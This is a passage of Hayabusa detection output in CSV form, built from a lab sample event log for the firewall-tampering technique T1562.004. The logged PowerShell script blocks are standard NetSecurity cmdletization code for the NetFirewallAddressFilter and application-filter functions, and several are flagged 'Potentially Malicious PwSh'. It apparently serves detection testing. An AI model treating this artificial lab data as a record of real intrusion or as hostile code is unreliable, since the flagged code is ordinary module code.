[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if
($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 
'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.973 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { 
param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 